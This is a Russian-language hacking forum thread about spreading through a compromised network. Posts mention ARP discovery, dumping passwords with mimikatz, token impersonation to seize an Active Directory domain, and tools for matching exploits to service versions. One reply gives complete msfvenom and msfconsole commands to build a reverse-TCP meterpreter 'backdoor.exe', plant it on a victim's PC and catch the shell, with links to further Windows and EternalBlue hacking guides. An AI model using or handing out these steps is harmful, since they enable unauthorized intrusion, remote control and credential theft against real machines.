Ну например со скомпроментированной машины arp запросом, выяснить адреса или имена других машин. После попробовать скомпроментировать их)) если сеть доменная или один администратор вытащи пароли, тем же mimikatz. Последний раз захват доменной сети делал с помощью impersonate token админа AD

Простите какими способами можно подобрать эксплоит именно для определенного сервиса + версий ?
Существую какие нибудь простые сканеры которые при сканирований дали простой ответ, есть эксплоит для этого сервиса который подходит 10-90% может использовать)

Searchsploit в принципе ничем не отличается простым search в mete.
Вот допустим в RouterSploit все отлично сделано есть разные сканеры для всех типов роутеров + есть стандартный сканер Autopwn которое сканирует машину на все виды эксплоитов.(да автоматизировано для ленивых, но работает же)
Ну если в Metasploit вопрос решается простым поиском в Searchsploit , потом перебором всех эксплоитов то ладно.
[doublepost=1507963872,1507963019][/doublepost]

Если у тебя есть доступ к этим 3-ем ПК, то самый простой вариант.
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.0.свой ип lport=4444 -f exe -o backdoor.exe
создаем exe файл backdoor.exe и кидаем его через флешку или еще что нибудь на ПК жертвы.
Потом зайти в msfconsole → use exploit/multi/handler → set payload windows/meterpreter/reverse_tcp →
set LHOST 192.168.0.свой Локальный ип

set LPORT 4444

exploit

Если запустить backdoor.exe файл то, вы получите сессию meterprete.
Обрати внимание если Windows 64 битный , то надо использовать windows/x64/meterpreter/reverse_tcp.
Это если у тебя есть доступ к этим Пк, но если нету это уже другая история.
В принципе что бы больше таких вопросов не возникало советую прочитать.
https://hackware.ru/?p=2900
https://codeby.net/threads/hack-windows-10-meterpreter.58386/
https://codeby.net/threads/eternalblue-vzlom-windows-pc.59674/